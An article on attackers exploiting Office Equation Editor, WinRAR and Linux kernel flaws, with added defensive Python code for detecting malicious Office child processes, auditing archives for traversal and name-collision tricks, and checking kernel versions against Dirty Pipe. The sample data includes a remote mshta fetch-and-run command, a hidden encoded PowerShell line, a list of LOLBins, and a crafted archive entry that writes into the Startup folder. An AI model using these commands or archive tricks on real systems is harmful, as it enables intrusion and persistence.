
Hackers Exploiting Windows and Linux System Flaws for Unauthorized Access in Actual Assaults

Rise in phishing attacks exploiting vulnerabilities in Windows and Linux systems; Microsoft Office Equation Editor, left unpatched, remains a primary point of entry.


In the ever-evolving landscape of cybersecurity, the exploitation of known vulnerabilities continues to pose a significant threat to both individuals and organizations. Recent research has shown that even years-old flaws, such as CVE-2017-11882 and CVE-2018-0802 in the Equation Editor component (EQNEDT32.EXE) of Microsoft Office, remain heavily exploited despite patches having been available for years. Microsoft removed the Equation Editor component altogether in its January 2018 Office updates, so on a fully patched installation the EQNEDT32.EXE binary should no longer be present at all.

These attacks typically begin with phishing emails or malicious web content that deliver weaponized documents. When a document is opened, the embedded exploit triggers the unpatched flaw and the attacker's code runs with the privileges of the user who opened it. In the "dual-exploit" chains observed, that foothold is combined with a separate local privilege-escalation exploit; only after that second step can the adversary bypass user-level defenses and deploy a rootkit without detection.
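The process-creation signal for the Equation Editor chain is simple to state: EQNEDT32.EXE has no legitimate reason to spawn a child process, and Office applications have no ordinary reason to launch script hosts or other living-off-the-land binaries. The following is an added example, not code from the article or from any vendor, that runs those two rules over process-creation events in the shape of Sysmon Event ID 1 (fields ParentImage, Image, CommandLine). The sample events are constructed for illustration; the host name example.invalid and the user alice are placeholders.

```python
import ntpath

# Added example (not from the article): detection logic for Equation Editor and
# Office-spawned child processes, run over Sysmon Event ID 1 style records.

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
EQUATION_EDITOR = "eqnedt32.exe"
# Interpreters and living-off-the-land binaries an Office document has no ordinary reason to launch.
LOLBINS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe", "bitsadmin.exe",
}


def image_name(path):
    """Lower-cased file name of a Windows path: 'C:\\Windows\\System32\\CMD.EXE' -> 'cmd.exe'."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return (severity, rule) for one process-creation event, or None if nothing matched."""
    parent = image_name(event["ParentImage"])
    child = image_name(event["Image"])
    # CVE-2017-11882 / CVE-2018-0802: the exploit runs inside EQNEDT32.EXE, which
    # legitimately never spawns anything, so any child process is a strong signal.
    if parent == EQUATION_EDITOR:
        return ("high", "equation_editor_child_process")
    # Macros and exploits in Office documents commonly stage through a script host or LOLBin.
    if parent in OFFICE_APPS and child in LOLBINS:
        return ("high", "office_spawns_lolbin")
    # Equation Editor is started out-of-process by DCOM (its parent is svchost.exe, not
    # WINWORD.EXE). Microsoft removed the component in January 2018, so seeing it run at
    # all on a patched estate is worth a look.
    if child == EQUATION_EDITOR:
        return ("medium", "equation_editor_launched")
    return None


def scan(events):
    """Run classify() over a list of events; return [(index, severity, rule), ...]."""
    hits = []
    for i, event in enumerate(events):
        verdict = classify(event)
        if verdict is not None:
            hits.append((i, verdict[0], verdict[1]))
    return hits


# Constructed sample events for illustration; they are not from any real incident.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r'"EQNEDT32.EXE" -Embedding'},
    {"ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c mshta http://example.invalid/a.hta"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",   # 32-bit print helper: a normal Word child process
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for index, severity, rule in scan(SAMPLE_EVENTS):
        print(f"event {index}: {severity} {rule} -> {SAMPLE_EVENTS[index]['CommandLine']}")
```

The ordering of the rules matters: the Equation Editor parent check comes first because it is the highest-confidence signal, and the "launched at all" rule is deliberately lower severity since an unpatched but otherwise idle estate will trigger it on every legitimate equation edit.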

Beyond Microsoft Office, attackers have also leveraged weaknesses in WinRAR's archive handling. CVE-2023-38831 lets an archive carry a benign-looking file alongside a folder of the same name, so that opening the decoy in WinRAR runs a script from that folder instead; CVE-2025-6218 is a directory traversal flaw that lets crafted entry names write files outside the intended extraction path. In August 2025, ESET researchers observed the Russia-aligned group RomCom exploiting a previously unknown WinRAR path traversal vulnerability, since assigned CVE-2025-8088, in the wild.
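Both WinRAR patterns can be caught before anything is written to disk by inspecting entry names, and the traversal class is defeated for good by resolving each destination path and refusing anything that lands outside the extraction directory. The block below is an added example, not code from the article, WinRAR or ESET: it audits a ZIP built in memory with Python's zipfile (WinRAR's own RAR format is not parsed here) for the same-name file/folder collision of CVE-2023-38831 and for traversal, absolute-path and NTFS alternate-data-stream names, and shows the containment check a hardened extractor needs. The sample archive contents are constructed.

```python
import io
import os
import re
import zipfile

# Added example (not from the article, WinRAR or ESET): pre-extraction audit of
# archive entry names plus a destination-containment check.

DRIVE_LETTER = re.compile(r"^[A-Za-z]:")


def suspicious_entry_reasons(name):
    """Per-entry checks on a raw archive member name. Returns a list of short reasons."""
    reasons = []
    norm = name.replace("\\", "/")
    if norm != name:
        reasons.append("backslash separator")
    if norm.startswith("/") or DRIVE_LETTER.match(norm):
        reasons.append("absolute path")
    if ".." in norm.split("/"):
        reasons.append("parent traversal")          # the CVE-2025-6218 pattern: ../ in the name
    body = norm[2:] if DRIVE_LETTER.match(norm) else norm
    if ":" in body:
        reasons.append("colon (NTFS alternate data stream syntax)")
    return reasons


def collision_findings(names):
    """CVE-2023-38831 pattern: a directory whose name equals a file's name up to trailing
    whitespace, e.g. 'report.pdf' next to 'report.pdf /report.pdf .cmd'."""
    files, dirs = set(), set()
    for name in names:
        norm = name.replace("\\", "/").rstrip("/")
        parts = norm.split("/")
        if name.endswith("/"):            # explicit directory entry
            prefixes = len(parts)
        else:
            files.add(norm)
            prefixes = len(parts) - 1
        for depth in range(1, prefixes + 1):
            dirs.add("/".join(parts[:depth]))
    return [(d, f"directory collides with file {f!r}")
            for d in sorted(dirs) for f in sorted(files)
            if d != f and d.rstrip() == f.rstrip()]


def audit_archive(data):
    """Return [(entry, reason), ...] for a ZIP given as bytes; an empty list means no findings."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = [info.filename for info in zf.infolist()]
    findings = [(n, r) for n in names for r in suspicious_entry_reasons(n)]
    return findings + collision_findings(names)


def safe_destination(dest_dir, name):
    """Absolute path where `name` may be written, or None if it would land outside dest_dir.
    Resolving the joined path and checking containment is what a hardened extractor must do
    in addition to rejecting suspicious names."""
    root = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(root, name.replace("\\", "/")))
    return target if os.path.commonpath([root, target]) == root else None


def build_sample_archive(malicious=True):
    """Constructed sample data: a ZIP carrying both abuse patterns, or a benign one."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4 decoy")
        if malicious:
            zf.writestr("report.pdf /report.pdf .cmd", b"calc.exe\r\n")
            zf.writestr("../../Users/Public/Start Menu/Programs/Startup/update.cmd", b"calc.exe\r\n")
        else:
            zf.writestr("images/chart.png", b"\x89PNG decoy")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, reason in audit_archive(build_sample_archive()):
        print(f"{reason}: {entry!r}")
    print(safe_destination("extract_root", "../../etc/cron.d/x"))   # None: escapes extract_root
```

The name audit and the containment check are complementary: the audit catches an archive that is hostile by construction, while safe_destination protects against any traversal variant the name checks did not anticipate, since it judges the resolved path rather than the spelling of the entry.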

On the Linux side, Dirty Pipe (CVE-2022-0847), a page-cache bug that lets an unprivileged local user write into read-only files, remains a favorite for privilege escalation; it was introduced in kernel 5.8 and fixed upstream in 5.16.11, 5.15.25 and 5.10.102. Older flaws such as CVE-2019-13272 (a ptrace credential-handling bug) and CVE-2021-22555 (a heap out-of-bounds write in netfilter's x_tables) continue to be used to gain root on unpatched Linux servers.
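A first triage question on any Linux host is whether its kernel falls inside the upstream range a given bug affects. The block below is an added example, not from the article, that encodes the published Dirty Pipe bounds (introduced in 5.8; fixed in 5.10.102, 5.15.25, 5.16.11 and in mainline from 5.17) and evaluates `uname -r` strings against them. The caveat is built into the verdict: distributions backport fixes without changing the version string, so "in the affected range" means "check the distro advisory", not "exploitable". The sample release strings are constructed.

```python
import os
import re

# Added example (not from the article): version-range check for Dirty Pipe (CVE-2022-0847).
# Bounds are from the public disclosure; distro kernels may be patched by backport.

DIRTY_PIPE = {
    "id": "CVE-2022-0847",
    "introduced": (5, 8, 0),
    "stable_fixes": [(5, 10, 102), (5, 15, 25), (5, 16, 11)],
    "mainline_fixed": (5, 17, 0),
}


def parse_kernel_version(release):
    """Leading major.minor[.patch] of a `uname -r` string.
    '5.10.0-21-amd64' -> (5, 10, 0); '5.15.0-1019-aws' -> (5, 15, 0); '6.1' -> (6, 1, 0)."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def upstream_vulnerable(version, advisory):
    """True if `version` (major, minor, patch) lies inside the affected upstream range."""
    if version < advisory["introduced"] or version >= advisory["mainline_fixed"]:
        return False
    for fixed in advisory["stable_fixes"]:
        if fixed[:2] == version[:2]:          # same stable series: compare patch level
            return version < fixed
    # Affected series with no stable fix at all (5.8, 5.9, 5.11 to 5.14 are end-of-life).
    return True


def assess(release, advisory=DIRTY_PIPE):
    """Human-readable verdict for one `uname -r` string."""
    version = parse_kernel_version(release)
    if upstream_vulnerable(version, advisory):
        return f"{release}: in the upstream range affected by {advisory['id']}; verify distro backports"
    return f"{release}: outside the upstream range affected by {advisory['id']}"


if __name__ == "__main__":
    # Check the host this runs on (Unix only), then a few constructed release strings.
    if hasattr(os, "uname"):
        print(assess(os.uname().release))
    for sample in ["5.10.0-21-amd64", "5.15.25", "5.16.10", "5.4.0-100-generic", "6.1.0-18-amd64", "5.13.19"]:
        print(assess(sample))
```

The advisory table is deliberately data, not code, so the same comparison serves other kernel bugs once their introduced and fixed versions are filled in from the respective advisories.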

The implants used in these attacks run largely in memory to evade file-based antivirus scans and abuse legitimate Windows services and processes to blend in with normal activity. The payload fetched when the vulnerability is triggered arrives in two stages: a small loader followed by the full-featured malware binary. Once that is in place, attackers commonly maintain access through command-and-control (C2) frameworks such as Sliver or Havoc, both of which are publicly available rather than custom tooling.

In many incidents the step after initial code execution is local privilege escalation to SYSTEM, as exemplified by exploitation of CVE-2024-35250, an elevation-of-privilege bug in the Windows kernel-mode streaming driver (ks.sys). With those privileges the attacker can load a malicious or vulnerable signed driver into kernel space, gaining unrestricted code execution at the highest level of the system.

The persistence of older vulnerabilities alongside newer flaws emphasizes the importance of timely patching and comprehensive defense-in-depth strategies. Organizations should prioritize updates for both user applications and system components to minimize the risk of these prevalent exploits in real-world attacks.

In response to these threats, Microsoft has continued to patch critical vulnerabilities affecting Microsoft Outlook and other products; customers of managed IT services generally receive these updates automatically, while other users are urged to install them manually. The Zug government has also launched a cybersecurity initiative to improve protection against cyberattacks, including those that exploit such vulnerabilities.

In conclusion, the exploitation of known vulnerabilities continues to be a significant threat in the current cybersecurity landscape. By prioritizing timely patching and adopting comprehensive defense-in-depth strategies, organizations can significantly reduce their risk of falling victim to these attacks.
